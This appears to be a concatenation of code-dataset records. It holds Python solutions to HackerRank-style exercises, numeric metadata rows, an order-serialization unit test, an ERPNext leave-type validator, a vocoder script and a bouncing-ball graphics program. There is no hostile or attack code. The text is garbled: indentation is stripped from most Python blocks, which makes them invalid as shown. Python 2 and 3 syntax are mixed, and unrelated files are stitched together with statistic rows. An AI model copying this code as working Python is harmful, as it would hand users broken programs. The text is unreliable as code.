b.insert(int(a[1]),int(a[2]))
elif a[0]=='print':
print(b)
elif a[0]=='remove':
b.remove(int(a[1]))
elif a[0]=='append':
b.append(int(a[1]))
elif a[0]=='sort':
b.sort()
elif a[0]=='pop':
b.pop()
elif a[0]=='reverse':
b.reverse()
#Tuples
if __name__ == '__main__':
n = int(input())
integer_list = map(int, input().split())
t=tuple(integer_list)
print(hash(t))
#sWAP cASE
def swap_case(s):
nuovaparola=""
for i in s:
if i.islower()==True:
nuovaparola+=i.upper()
else:
nuovaparola+=i.lower()
return nuovaparola
if __name__ == '__main__':
s = raw_input()
result = swap_case(s)
print result
#String Split and Join
def split_and_join(line):
a=line.split(" ")
a="-".join(a)
return a
if __name__ == '__main__':
line = raw_input()
result = split_and_join(line)
print result
#What's Your Name?
def print_full_name(a, b):
print ('Hello '+a+' '+b+'! You just delved into python.')
if __name__ == '__main__':
first_name = raw_input()
last_name = raw_input()
print_full_name(first_name, last_name)
#Mutations
def mutate_string(string, position, character):
    return string[:position] + character + string[position+1:]
if __name__ == '__main__':
    s = raw_input()
    i, c = raw_input().split()
    s_new = mutate_string(s, int(i), c)
    print s_new
#Find a string
def count_substring(string, sub_string):
count=0
for i in range(0,len(string)):
if string[i]==sub_string[0]:
if string[i:i+len(sub_string)]==sub_string:
count+=1
return count
if __name__ == '__main__':
string = raw_input().strip()
sub_string = raw_input().strip()
count = count_substring(string, sub_string)
print count
#String Validators
if __name__ == '__main__':
s = raw_input()
a=0
for i in s :
a=a+1
if i.isalnum()==True:
print('True')
break
if a==len(s):
print('False')
a=0
for i in s :
a=a+1
if i.isalpha()==True:
print('True')
break
if a==len(s):
print('False')
a=0
for i in s :
a=a+1
if i.isdigit()==True:
print('True')
break
if a==len(s):
print('False')
a=0
for i in s :
a=a+1
if i.islower()==True:
print('True')
break
if a==len(s):
print('False')
a=0
for i in s :
a=a+1
if i.isupper()==True:
print('True')
break
if a==len(s):
print('False')
#Text Alignment
a = int(input())
b = 'H'
for i in range(a):
print((b*i).rjust(a-1)+b+(b*i).ljust(a-1))
for i in range(a+1):
print((b*a).center(a*2)+(b*a).center(a*6))
for i in range((a+1)//2):
print((b*a*5).center(a*6))
for i in range(a+1):
print((b*a).center(a*2)+(b*a).center(a*6))
for i in range(a):
print(((b*(a-i-1)).rjust(a)+b+(b*(a-i-1)).ljust(a)).rjust(a*6))
#Text Wrap
import textwrap
def wrap(string, max_width):
a=''
k=0
for i in range(0,len(string)):
a+=string[i]
k+=1
if k==max_width:
print(a)
a=''
k=0
print(a)
return ''
if __name__ == '__main__':
string, max_width = raw_input(), int(raw_input())
result = wrap(string, max_width)
print result
#Designer Door Mat
l=list(map(int,input().split()))
n=l[0]
m=l[1]
for i in range(1,n,2):
print((i*'.|.').center(m,'-'))
print('WELCOME'.center(m,'-'))
for i in range(n-2,-1,-2):
print((i*'.|.').center(m, '-'))
#String Formatting
def print_formatted(number):
w=len(bin(number)[2:])
for i in range (1,number+1):
print(str(i).rjust(w)+' '+str(oct(i)[2:]).rjust(w)+' '+str(hex(i)[2:]).upper().rjust(w)+' '+str(bin(i)[2:]).rjust(w))
if __name__ == '__main__':
n = int(input())
print_formatted(n)
#Alphabet Rangoli
def print_rangoli(size):
lettere = 'abcdefghijklmnopqrstuvwxyz'
for i in range (size-1,0,-1):
riga=['-']*(4*size-3)
for j in range(0, size - i):
riga[2*(size-1+j)] = lettere[i+j]
riga[2*(size-1-j)] = lettere[i+j]
print("".join(riga))
for i in range(0,size):
riga=['-']*(4*size-3)
for j in range(0,size-i):
riga[2*(size-1+j)] = lettere[i+j]
riga[2*(size-1-j)] = lettere[i+j]
print("".join(riga))
if __name__ == '__main__':
n = int(input())
print_rangoli(n)
#Capitalize!
import math
import os
import random
import re
import sys
def solve(s):
n=s.split(' ')
for i in range(0,len(n)):
n[i]=n[i].capitalize()
s_up=' '.join(n)
return s_up
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = raw_input()
result = solve(s)
fptr.write(result + '\n')
fptr.close()
#The Minion Game
def minion_game(string):
s=0
k=0
vocali='AEIOU'
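# every substring starting at index i scores one point, and there are len(string)-i of them, so each starting character is worth len(string)-i points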
for i in range(len(string)):
if string[i] in vocali:
k+=len(string)-i  # equivalently: len(string[i:])
else:
s+=len(string)-i
if s>k:
print('Stuart',s)
elif s<k:
print('Kevin',k)
else:
print('Draw')
if __name__ == '__main__':
s = input()
minion_game(s)
#Merge the Tools!
def merge_the_tools(string, k):
t=[]
for i in range (0,len(string),k):
t.append(string[i:i+k])
for i in t:
u=''
for j in i:
if j not in u:
u+=j
print (u)
if __name__ == '__main__':
string, k = input(), int(input())
merge_the_tools(string, k)
#collections.Counter()
from collections import Counter
n=int(input())
l=list(map(int,input().split()))
nclient=int(input())
p=0
c=Counter(l)
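# c maps each shoe size to the number of pairs still in stock; a pair is sold only while its count is positive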
for _ in range (nclient):
client=list(map(int,input().split()))
if client[0] in c and c[client[0]]>0:
p+=client[1]
c[client[0]]-=1
print(p)
#Introduction to Sets
def average(array):
s=set(array)
m=sum(s)/len(s)
return m
if __name__ == '__main__':
n = int(input())
arr = list(map(int, input().split()))
result = average(arr)
print(result)
#DefaultDict Tutorial
from collections import defaultdict
A=defaultdict(list)
n,m=map(int,input().split())
for i in range (n):
A[input()].append(i+1)
for i in range(m):
e=input()
if e in A:
print(' '.join(map(str,A[e])))
else :
print (-1)
#Calendar Module
import calendar
a=input().split(' ')
giorno=calendar.weekday(int(a[2]),int(a[0]),int(a[1]))
g=calendar.day_name[giorno]
print(g.upper())
#Exceptions
n=int(input())
for i in range(n):
try:
a,b=map(int,input().split())
print (a//b)
except ZeroDivisionError as e:
print('Error Code:',e)
except ValueError as v:
print('Error Code:',v)
#Collections.namedtuple()
from collections import namedtuple
n=int(input())
somma=0
l=input().split()
stud=namedtuple('stud',l)
for _ in range (n):
l1,l2,l3,l4=input().split()
s=stud(l1,l2,l3,l4)
somma+=int(s.MARKS)
print(somma/n)
#Time Delta
import math
import os
import random
import re
import sys
from datetime import datetime
def time_delta(t1, t2):
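# '%a %d %b %Y %H:%M:%S %z' parses timestamps such as 'Sun 10 May 2015 13:54:36 -0700'; %z keeps the UTC offset, so the subtraction below is timezone-aware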
g1=datetime.strptime(t1,'%a %d %b %Y %H:%M:%S %z')
g2=datetime.strptime(t2,'%a %d %b %Y %H:%M:%S %z')
differenza=int(abs((g1-g2).total_seconds()))
return str(differenza)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
t1 = input()
t2 = input()
delta = time_delta(t1, t2)
fptr.write(delta + '\n')
fptr.close()
#No Idea!
n,m=map(int,input().split())
arr=list(map(int,input().split()))
A=set(map(int,input().split()))
B=set(map(int,input().split()))
happiness=0
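# A and B are sets, so each membership test is O(1) and a single pass over arr is enough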
for i in arr:
if i in A:
happiness+=1
if i in B:
happiness-=1
print(happiness)
#Collections.OrderedDict()
from collections import OrderedDict
n=int(input())
d=OrderedDict()
for _ in range (n):
i=input().split()
if len(i)==2:
if i[0] not in d:
d[i[0]]=int(i[1])
else:
d[i[0]]+=int(i[1])
else:
if i[0]+' '+i[1] not in d:
d[i[0]+' '+i[1]]=int(i[2])
else:
d[i[0]+' '+i[1]]+=int(i[2])
for e in d:
print(e,d[e])
#Symmetric Difference
n1=input()
a=input().split(' ')
n2=input()
b=input().split(' ')
a1=list(map(int,a))
b1=list(map(int,b))
s1=set(a1)
s2=set(b1)
s3=s1.symmetric_difference(s2)
l=list(s3)
l.sort()
for elem in l :
print (elem)
#Set .add()
n=int(input())
s=set()
for i in range(0,n):
s.add(input())
print(len(s))
#Word Order
from collections import OrderedDict
n=int(input())
d=OrderedDict()
for i in range(n):
s=input()
if s not in d:
d[s]=1
else:
d[s]+=1
print (len(d))
for e in d :
print(d[e],end=' ')
#Set .discard(), .remove() & .pop()
n = int(input())
s = set(map(int, input().split()))
comandi=int(input())
for i in range (0,comandi):
a=input().split(' ')
if a[0]=='pop':
s.pop()
if a[0] =='discard':
s.discard(int(a[1]))
if a[0] == 'remove':
s.remove(int(a[1]))
print(sum(s))
#Collections.deque()
from collections import deque
d=deque()
for _ in range(int(input())):
metodo,*valore=input().split()
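# dispatch the command name to the matching deque method; any remaining tokens become its arguments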
getattr(d, metodo)(*valore)
for elem in d:
print(elem,end=' ')
#Company Logo
import math
import os
import random
import re
import sys
from collections import Counter
if __name__ == '__main__':
s = sorted(input())
c=Counter(s)
l=c.most_common(3)
for e in l :
print(e[0]+' '+str(e[1]))
#Set .union() Operation
n1=int(input())
s1=set(map(int,input().split(' ')))
n2=int(input())
s2=set(map(int,input().split(' ')))
s3=s1.union(s2)
print(len(s3))
#Set .intersection() Operation
n1=input()
s1=set(input().split(' '))
n2=input()
s2=set(input().split(' '))
print(len(s1.intersection(s2)))
#Set .difference() Operation
n1,s1=input(),set(input().split())
n2,s2=input(),set(input().split())
print(len(s1.difference(s2)))
#Set .symmetric_difference() Operation
n1,s1= input(),set(input().split())
n2,s2= input(),set(input().split())
print(len(s1.symmetric_difference(s2)))
#Set Mutations
n,s=input(),set(map(int,input().split()))
for _ in range(int(input())):
l,i=input().split(),set(map(int,input().split()))
if l[0]=='update':
s.update(i)
if l[0]=='intersection_update':
s.intersection_update(i)
if l[0]=='symmetric_difference_update':
s.symmetric_difference_update(i)
if l[0]=='difference_update':
s.difference_update(i)
print(sum(s))
#The Captain's Room
n=int(input())
l=input().split()
s1=set()
s2=set()
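# s1 collects every distinct room number, s2 only those seen more than once; their difference leaves just the captain's room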
for i in l:
if i not in s1:
s1.add(i)
else:
s2.add(i)
s1.difference_update(s2)
print(list(s1)[0])
#Check Subset
n = int(input())
for _ in range(n):
a,s1=input(),set(map(int,input().split()))
b,s2=input(),set(map(int,input().split()))
if s1.intersection(s2)==s1:
print('True')
else:
print('False')
#Check Strict Superset
s=set(map(int,input().split()))
n=int(input())
sup=True
for _ in range(n):
s1=set(map(int,input().split()))
for e in s1:
if e not in s:
sup=False
break
if s==s1:
sup=False
break
print(sup)
#Zipped!
n,x=map(int,input().split())
l=[]
for i in range (x):
l.append(list(map(float,input().split())))
for i in (zip(*l)):
media=sum(i)/len(i)
print (media)
#Athlete Sort
import math
import os
import random
import re
import sys
if __name__ == '__main__':
nm = input().split()
n = int(nm[0])
m = int(nm[1])
arr = []
for _ in range(n):
arr.append(list(map(int, input().rstrip().split())))
k = int(input())
colonna=[]
for i in range(n):
colonna.append(arr[i][k])
colonna.sort()
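# for each value of the sorted k-th column, print the first remaining row with that key and drop it, so rows with equal keys keep their original order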
for i in range(n):
for j in range(n):
if colonna[i]==arr[j][k]:
print(*arr[j])
arr.remove(arr[j])
break
#ginortS
s=input()
p=[]
d=[]
m=[]
M=[]
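# bucket the characters: m = lowercase, M = uppercase, d = odd digits, p = even digits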
for i in range(len(s)):
if s[i].isupper():
M.append(s[i])
elif s[i].islower():
m.append(s[i])
elif int(s[i])%2==0:
p.append(s[i])
else:
d.append(s[i])
M.sort()
m.sort()
p.sort()
d.sort()
print(''.join(m+M+d+p))
#Detect Floating Point Number
import re
n=int(input())
for i in range (n):
numero=input()
if re.match(r"^[-+]?[0-9]*\.[0-9]+$",numero):
print(True)
else :
print(False)
#Map and Lambda Function
cube = lambda x :x**3
def fibonacci(n):
l=[0,1]
if n<2:
return l[:n]
for _ in range(n-2):
l.append(l[-1]+l[-2])
return l
if __name__ == '__main__':
n = int(input())
print(list(map(cube, fibonacci(n))))
#Re.split()
regex_pattern = r"[,.]"
import re
print("\n".join(re.split(regex_pattern, input())))
#Validating phone numbers
import re
n=int(input())
for i in range(n):
if re.match(r'[789]\d{9}$',input()):
print('YES')
else:
print('NO')
#Validating and Parsing Email Addresses
import re
import email.utils
n=int(input())
for i in range(n):
e=email.utils.parseaddr(input())
if re.match(r'[a-z][-a-z._0-9]+@[a-z]+\.[a-z]{1,3}$',e[1]):
print(email.utils.formataddr(e))
#Hex Color Code
import re
n=int(input())
for _ in range(n):
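# the leading '.' requires some character before '#', so selector lines that begin with '#' are skipped and only property values are matched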
color=re.findall(r':?.(#[0-9a-fA-F]{6}|#[0-9a-fA-F]{3})',input())
for c in color:
print(c)
#XML 1 - Find the Score
import sys
import xml.etree.ElementTree as etree
def get_attr_number(node):
s=0
for child in node.iter():
s+=len(child.attrib)
return s
if __name__ == '__main__':
sys.stdin.readline()
xml = sys.stdin.read()
tree = etree.ElementTree(etree.fromstring(xml))
root = tree.getroot()
print(get_attr_number(root))
#Validating UID
import re
for i in range(int(input())):
carta=input()
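# a valid UID has no repeated characters, at least 2 uppercase letters, at least 3 digits, and exactly 10 alphanumeric characters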
if re.match(r'^(?!.*(.).*\1)(?=(?:.*[A-Z]){2,})(?=(?:.*\d){3,})[a-zA-Z0-9]{10}$',carta):
print('Valid')
else:
print('Invalid')
#XML2 - Find the Maximum Depth
import xml.etree.ElementTree as etree
maxdepth = 0
def depth(elem, level):  # recursion is needed: for every child we must check how many children it has in turn, increasing the level by 1 each time
global maxdepth  # maxdepth is a global variable, so it does not need to be returned
level+=1
if level >= maxdepth:
maxdepth = level
for child in elem:
depth(child, level)
if __name__ == '__main__':
n = int(input())
xml = ""
for i in range(n):
xml = xml + input() + "\n"
tree = etree.ElementTree(etree.fromstring(xml))
depth(tree.getroot(), -1)
print(maxdepth)
#Arrays
import numpy
def arrays(arr):
a=numpy.array(arr,float)
return numpy.flip(a)
arr = input().strip().split(' ')
result = arrays(arr)
print(result)
#Shape and Reshape
import numpy
#l=list(map(int,input().split()))
#a=numpy.array(l)
#print (numpy.reshape(a,(3,3)))
l=input().split()
a=numpy.array(l,int)
print (numpy.reshape(a,(3,3)))
#Transpose and Flatten
import numpy
n,m=map(int,input().split())
l=[]
for i in range(n):
l.append(input().split())
a=numpy.array(l,int)
print (numpy.transpose(a))
print (a.flatten())
#Concatenate
import numpy
n,m,p=map(int,input().split())
l1=[]
l2=[]
for i in range(n):
l1.append(input().split())
for i in range (m):
l2.append(input().split())
a=numpy.array(l1,int)
b=numpy.array(l2,int)
print(numpy.concatenate((a,b),axis=0))
#Zeros and Ones
import numpy
a,b,*c=map(int,input().split())
# numpy.int was removed from recent NumPy releases; the builtin int gives the same integer dtype
print (numpy.zeros((a,b,*c),dtype=int))
print (numpy.ones((a,b,*c),dtype=int))
#Eye and Identity
import numpy
r,c=map(int,input().split())
numpy.set_printoptions(sign=' ')
print (numpy.eye(r,c,k=0))
#Array Mathematics
import numpy
n,m=map(int,input().split())
l1=[]
l2=[]
for _ in range(n):
l1.append(input().split())
for _ in range(n):
l2.append(input().split())
a=numpy.array(l1,int)
b=numpy.array(l2,int)
print(a+b)
print(a-b)
print(a*b)
print(a//b)
print(a%b)
print(a**b)
#Floor, Ceil and Rint
import numpy
a=numpy.array(input().split(),float)
numpy.set_printoptions(sign=' ')
print(numpy.floor(a))
print(numpy.ceil(a))
print(numpy.rint(a))
#Sum and Prod
import numpy
n,m=map(int,input().split())
l=[]
for _ in range(n):
l.append(input().split())
a=numpy.array(l,int)
s= numpy.sum(a,axis=0)
print (numpy.prod(s))
#Min and Max
import numpy
n,m=map(int,input().split())
l=[]
for _ in range(n):
l.append(input().split())
a=numpy.array(l,int)
m=numpy.min(a,axis=1)
print(numpy.max(m))
#Mean, Var, and Std
import numpy
n,m=map(int,input().split())
l=[]
for _ in range(n):
l.append(input().split())
a=numpy.array(l,int)
numpy.set_printoptions(legacy='1.13')
print(numpy.mean(a,axis=1))
print(numpy.var(a,0))
print(numpy.std(a))
#Dot and Cross
import numpy
n=int(input())
l1=[]
l2=[]
for _ in range(n):
l1.append(input().split())
a=numpy.array(l1,int)
for _ in range(n):
l2.append(input().split())
b=numpy.array(l2,int)
print(numpy.dot(a,b))
#Inner and Outer
import numpy
a=numpy.array(input().split(),int)
b=numpy.array(input().split(),int)
print(numpy.inner(a,b))
print(numpy.outer(a,b))
#Polynomials
import numpy
a=numpy.array(input().split(),float)
val=int(input())
print(numpy.polyval(a,val))
#Linear Algebra
import numpy
n=int(input())
l=[]
for _ in range(n):
l.append(input().split())
a=numpy.array(l,float)
print(round(numpy.linalg.det(a),2))
#Exercises of the Problem 2 (6/6)
#Birthday Cake Candles
import math
import os
import random
import re
import sys
def birthdayCakeCandles(candles):
m=max(candles)
return candles.count(m)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
candles_count = int(input().strip())
candles = list(map(int, input().rstrip().split()))
result = birthdayCakeCandles(candles)
fptr.write(str(result) + '\n')
fptr.close()
#Number Line Jumps
import math
import os
import random
import re
import sys
def kangaroo(x1, v1, x2, v2):
if x2>x1 and v2>=v1:
risp='NO'
return risp
if x1>x2 and v1>=v2:
risp='NO'
return risp
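# after the early 'NO' returns the kangaroo that starts behind is strictly faster, so they land on the same spot exactly when the head start is a multiple of the speed difference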
if (x2-x1)%(v1-v2)==0:
risp ='YES'
return risp
else :
risp='NO'
return risp
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
x1V1X2V2 = input().split()
x1 = int(x1V1X2V2[0])
v1 = int(x1V1X2V2[1])
x2 = int(x1V1X2V2[2])
v2 = int(x1V1X2V2[3])
result = kangaroo(x1, v1, x2, v2)
fptr.write(result + '\n')
fptr.close()
#Viral Advertising
import math
import os
import random
import re
import sys
def viralAdvertising(n):
l=[2]
for i in range(n-1):
l.append(math.floor(l[-1]*3/2))
return (sum(l))
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
result = viralAdvertising(n)
fptr.write(str(result) + '\n')
fptr.close()
#Recursive Digit Sum
import math
import os
import random
import re
import sys
def superDigit(n, k):
if len(n)==1:
return int(n)
l=list(map(int,n))
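# the super digit of n repeated k times equals the super digit of (digit sum of n) * k, so one reduction step shrinks the number drastically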
p=sum(l)*k
return superDigit(str(p),1)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nk = input().split()
n = nk[0]
k = int(nk[1])
result = superDigit(n, k)
fptr.write(str(result) + '\n')
fptr.close()
#Insertion Sort - Part 1
import math
import os
import random
import re
import sys
def insertionSort1(n, arr):
num=arr[-1]
for i in range(2,n+1):
if arr[n-i]>num:
arr[n-i+1]=arr[n-i]
print(*arr)
else:
arr[n-i+1]=num
print(*arr)
break
if arr[0]>num:
arr[1]=arr[0]
arr[0]=num
print(*arr)
if __name__ == '__main__':
n = int(input())
arr = list(map(int, input().rstrip().split()))
insertionSort1(n, arr)
#Insertion Sort - Part 2
import math
import os
import random
import re
import sys
def insertionSort2(n, arr):
    for i in range(1, n):
        for j in range(0, i):
            if arr[i] < arr[j]:
                # pop the value first, then re-insert it just in front of arr[j]
                val = arr.pop(i)
                arr.insert(j, val)
                break
        print(*arr)
if __name__ == '__main__':
n = int(input())
arr = list(map(int, input().rstrip().split()))
insertionSort2(n, arr)
| 19.026799 | 156 | 0.540706 | 3,734 | 24,849 | 3.479914 | 0.115426 | 0.044328 | 0.024473 | 0.036401 | 0.434046 | 0.357857 | 0.280437 | 0.243112 | 0.211867 | 0.204941 | 0 | 0.022463 | 0.283392 | 24,849 | 1,305 | 157 | 19.041379 | 0.70725 | 0.070989 | 0 | 0.475392 | 0 | 0.003356 | 0.047821 | 0.009776 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.102908 | null | null | 0.1566 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21f17d842da515de7fc906d22c723ce681702761 | 2,046 | py | Python | oms/test/test_order.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 5 | 2021-08-10T23:16:44.000Z | 2022-03-17T17:27:00.000Z | oms/test/test_order.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 330 | 2021-06-10T17:28:22.000Z | 2022-03-31T00:55:48.000Z | oms/test/test_order.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 6 | 2021-06-10T17:20:32.000Z | 2022-03-28T08:08:03.000Z | import logging
import helpers.hunit_test as hunitest
import oms.order as omorder
import oms.order_example as oordexam
_LOG = logging.getLogger(__name__)
class TestOrder1(hunitest.TestCase):
def test1(self) -> None:
"""
Test building and serializing an Order.
"""
order = oordexam.get_order_example1()
# Check.
act = str(order)
exp = r"""Order: order_id=0
creation_timestamp=2000-01-01 09:30:00-05:00
asset_id=101
type_=price@twap
start_timestamp=2000-01-01 09:35:00-05:00
end_timestamp=2000-01-01 09:40:00-05:00
curr_num_shares=0.0
diff_num_shares=100.0
tz=America/New_York"""
exp = exp.replace("\n", " ")
self.assert_equal(act, exp, fuzzy_match=True)
# Deserialize from string.
order2 = omorder.Order.from_string(act)
# Check.
act = str(order2)
self.assert_equal(act, exp, fuzzy_match=True)
class TestOrders1(hunitest.TestCase):
def test1(self) -> None:
"""
Test building and serializing a list of Orders.
"""
orders = [oordexam.get_order_example1(), oordexam.get_order_example1()]
act = omorder.orders_to_string(orders)
exp = r"""
Order: order_id=0 creation_timestamp=2000-01-01 09:30:00-05:00 asset_id=101 type_=price@twap start_timestamp=2000-01-01 09:35:00-05:00 end_timestamp=2000-01-01 09:40:00-05:00 curr_num_shares=0.0 diff_num_shares=100.0 tz=America/New_York
Order: order_id=0 creation_timestamp=2000-01-01 09:30:00-05:00 asset_id=101 type_=price@twap start_timestamp=2000-01-01 09:35:00-05:00 end_timestamp=2000-01-01 09:40:00-05:00 curr_num_shares=0.0 diff_num_shares=100.0 tz=America/New_York
"""
# exp = exp.replace("\n", " ")
self.assert_equal(act, exp, fuzzy_match=True)
# Deserialize from string.
orders2 = omorder.orders_from_string(act)
# Check.
act = omorder.orders_to_string(orders2)
self.assert_equal(act, exp, fuzzy_match=True)
| 37.888889 | 236 | 0.663245 | 312 | 2,046 | 4.153846 | 0.253205 | 0.090278 | 0.104167 | 0.118056 | 0.743827 | 0.676698 | 0.676698 | 0.676698 | 0.622685 | 0.622685 | 0 | 0.127034 | 0.218964 | 2,046 | 53 | 237 | 38.603774 | 0.68398 | 0.091887 | 0 | 0.228571 | 0 | 0.057143 | 0.430786 | 0.166113 | 0 | 0 | 0 | 0 | 0.114286 | 1 | 0.057143 | false | 0 | 0.114286 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21f180b857dbd23c3f25d5d18d9b868a2c717d34 | 1,147 | py | Python | mindhome_alpha/erpnext/hr/doctype/leave_type/leave_type.py | Mindhome/field_service | 3aea428815147903eb9af1d0c1b4b9fc7faed057 | [
"MIT"
] | 1 | 2021-04-29T14:55:29.000Z | 2021-04-29T14:55:29.000Z | mindhome_alpha/erpnext/hr/doctype/leave_type/leave_type.py | Mindhome/field_service | 3aea428815147903eb9af1d0c1b4b9fc7faed057 | [
"MIT"
] | null | null | null | mindhome_alpha/erpnext/hr/doctype/leave_type/leave_type.py | Mindhome/field_service | 3aea428815147903eb9af1d0c1b4b9fc7faed057 | [
"MIT"
] | 1 | 2021-04-29T14:39:01.000Z | 2021-04-29T14:39:01.000Z | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import calendar
import frappe
from datetime import datetime
from frappe.utils import today
from frappe import _
from frappe.model.document import Document
class LeaveType(Document):
def validate(self):
if self.is_lwp:
leave_allocation = frappe.get_all("Leave Allocation", filters={
'leave_type': self.name,
'from_date': ("<=", today()),
'to_date': (">=", today())
}, fields=['name'])
leave_allocation = [l['name'] for l in leave_allocation]
if leave_allocation:
frappe.throw(_('Leave application is linked with leave allocations {0}. Leave application cannot be set as leave without pay').format(", ".join(leave_allocation))) #nosec
if self.is_lwp and self.is_ppl:
frappe.throw(_("Leave Type can be either without pay or partial pay"))
if self.is_ppl and (self.fraction_of_daily_salary_per_leave < 0 or self.fraction_of_daily_salary_per_leave > 1):
frappe.throw(_("The fraction of Daily Salary per Leave should be between 0 and 1"))
| 38.233333 | 174 | 0.741935 | 168 | 1,147 | 4.875 | 0.458333 | 0.10989 | 0.029304 | 0.076923 | 0.115995 | 0.115995 | 0.080586 | 0 | 0 | 0 | 0 | 0.010299 | 0.153444 | 1,147 | 29 | 175 | 39.551724 | 0.833162 | 0.110724 | 0 | 0 | 0 | 0 | 0.274606 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.318182 | 0 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
21f37da3a047adbe8267c14542444fce93f2f143 | 628 | py | Python | vocoder.py | tapsoft/autovc | b89183b4f02facbeaee73c2c91ef05615e7985c0 | [
"MIT"
] | 1 | 2021-05-18T19:09:05.000Z | 2021-05-18T19:09:05.000Z | vocoder.py | tapsoft/autovc | b89183b4f02facbeaee73c2c91ef05615e7985c0 | [
"MIT"
] | null | null | null | vocoder.py | tapsoft/autovc | b89183b4f02facbeaee73c2c91ef05615e7985c0 | [
"MIT"
] | null | null | null | import os
import torch
import librosa
import pickle
import soundfile as sf
from synthesis import build_model
from synthesis import wavegen
spect_vc = pickle.load(open('results.pkl', 'rb'))
device = torch.device("cuda")
model = build_model().to(device)
checkpoint = torch.load("checkpoint_step001000000_ema.pth")
model.load_state_dict(checkpoint["state_dict"])
outputDir = './wavs'
for spect in spect_vc:
name = spect[0]
c = spect[1]
print(name)
waveform = wavegen(model, c=c)
#librosa.output.write_wav(name+'.wav', waveform, sr=16000)
sf.write(os.path.join(outputDir, name+'.wav'), waveform, 16000) | 27.304348 | 67 | 0.727707 | 91 | 628 | 4.912088 | 0.505495 | 0.058166 | 0.085011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038889 | 0.140127 | 628 | 23 | 67 | 27.304348 | 0.788889 | 0.090764 | 0 | 0 | 0 | 0 | 0.120841 | 0.056042 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.368421 | 0 | 0.368421 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
21f395f0029b2866265b7a849d224eea97a12f20 | 2,067 | py | Python | my_drawing/bouncing_ball.py | YuanMaSa/stancode-projects | d4b8d07650786bdd25fb00c5bada6914cc18b5f4 | [
"MIT"
] | null | null | null | my_drawing/bouncing_ball.py | YuanMaSa/stancode-projects | d4b8d07650786bdd25fb00c5bada6914cc18b5f4 | [
"MIT"
] | null | null | null | my_drawing/bouncing_ball.py | YuanMaSa/stancode-projects | d4b8d07650786bdd25fb00c5bada6914cc18b5f4 | [
"MIT"
] | null | null | null | """
File: bouncing_ball.py
Name: Jonathan Ma
-------------------------
TODO:
"""
from campy.graphics.gobjects import GOval
from campy.graphics.gwindow import GWindow
from campy.gui.events.timer import pause
from campy.gui.events.mouse import onmouseclicked
VX = 3
DELAY = 10
GRAVITY = 1
SIZE = 20
REDUCE = 0.9
START_X = 30
START_Y = 40
window = GWindow(800, 500, title='bouncing_ball.py')
# ball creation
ball = GOval(SIZE, SIZE, x=START_X, y=START_Y)
ball.filled = True
ball.fill_color = "#000000"
# the number of bouncing
bouncing_count = 0
# check if the ball has been clicked
usr_clicked = False
# the number of clicks
count_clicks = 0
def main():
"""
This program simulates a bouncing ball at (START_X, START_Y)
that has VX as x velocity and 0 as y velocity. Each bounce reduces
y velocity to REDUCE of itself.
"""
window.add(ball)
onmouseclicked(click_event)
def click_event(mouse):
"""
:param mouse:
:return: None
"""
global usr_clicked
global bouncing_count
global count_clicks
vy = 0
if usr_clicked is False:
count_clicks += 1
while True:
usr_clicked = True
ball.move(VX, vy)
if ball.y + ball.height >= window.height:
# check if the ball hit the ground
print("hit!!!")
vy = (-vy + GRAVITY) * REDUCE
bouncing_count += 1
else:
# the ball has not reached the ground yet
vy += GRAVITY
if ball.x + ball.width >= window.width:
# check if the ball has moved out of the scene
usr_clicked = False
break
print(f"ball position: {ball.y + ball.height}")
print(f"VY: {str(vy)}")
pause(DELAY)
if count_clicks == 3:
usr_clicked = True
window.remove(ball)
window.add(ball, START_X, START_Y)
if __name__ == "__main__":
main()
